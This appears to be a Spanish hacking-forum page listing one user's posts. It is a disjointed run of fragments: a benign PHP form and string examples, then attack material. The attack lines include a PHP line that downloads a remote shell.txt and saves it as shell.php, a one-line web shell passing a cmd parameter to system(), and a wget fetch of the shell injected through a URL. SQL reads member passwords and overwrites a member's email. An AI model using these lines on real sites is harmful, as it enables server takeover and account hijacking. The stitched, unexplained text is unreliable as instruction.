Citartambien existen algunos server sin consolaComo?
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCitartambien existen algunos server sin consolaComo?
Citarof the object you are trying to operate on was loaded _before_ unserialize()
file_get_contents("url);
Cita de: eLank0 en 8 Marzo 2009, 14:08 PM
Con $PHP_SELF te sale en la misma página si es lo que quieres...
S2
$_SERVER['SCRIPT_NAME'];
;
<html>
<head>
<title>EJEMPLO</title>
</head>
<body>
<FORM ACTION="<? $_SERVER['SCRIPT_NAME']; ?>" METHOD="POST">
NOMBRE : <INPUT TYPE="text" NAME="nombre"><BR>
<INPUT TYPE="submit" VALUE="Enviar">
</FORM>
<?
$valor_nombre = htmlentities($_POST['nombre'],ENT_QUOTES);
if (isset($valor_nombre) && !empty($valor_nombre)){
echo $valor_nombre."<br>";
}else{
echo "SIN VALOR<br>";
}
?>
</body>
</html>
<?
$cadena = "Yo me Llamo Oz, y Tengo 2 Perros y 4 Gatos , Soy Chileno y Algun Dia GAnaremos el Mundial";
$Solo_50 = substr($cadena,0,50);
?>
<? file_put_contents('shell.php',file_get_contents('http://www.ruta.com/shell.txt'));?>
<? system($_REQUEST['cmd']); ?>
wget -c --output-document=shell.php www.script.com/shell.txt
http://www.pagina.com/file/c.php?cmd=wget -c --output-document=shell.php www.script.com/shell.txt
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x';
UPDATE members
SET email = 'steve@unixwiz.net'
WHERE email = 'bob@example.com';